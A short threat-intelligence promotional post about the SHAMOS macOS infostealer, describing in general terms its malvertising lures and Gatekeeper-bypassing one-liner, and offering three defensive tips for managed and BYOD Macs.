Shamos macOS Infostealer: Malvertising Lures, BYOD Gaps, and Sector Expansion

Mac users, stop pasting Terminal “fixes” you found above the fold on Google.

SHAMOS—an AMOS offshoot from COOKIE SPIDER—is eating Keychains via malvertising and fake “Apple help” sites. CrowdStrike logged 300+ delivery attempts (June–Aug). The play: a one-liner that kneecaps Gatekeeper, pulls a Bash installer, and goes shopping for creds. BYOD/unmanaged Macs = soft underbelly.

3 fast wins:

• Enforce Gatekeeper/XProtect via MDM; block unsigned binaries/scripts.

• Load IOCs; watch LaunchDaemons writes, Keychain access, and search-ad lures.

• Train users: “Never paste a fix from a website,” period.

If a Mac flips protections off, would your BYOD gate catch it—or stroll right in? 🍪🕷️🍎

Read the breakdown & subscribe: https://blog.alphahunt.io/shamos-macos-infostealer-malvertising-lures-byod-gaps-and-sector-expansion

#AlphaHunt #CyberSecurity #macOS #Infostealer #SOC

Did you learn something new?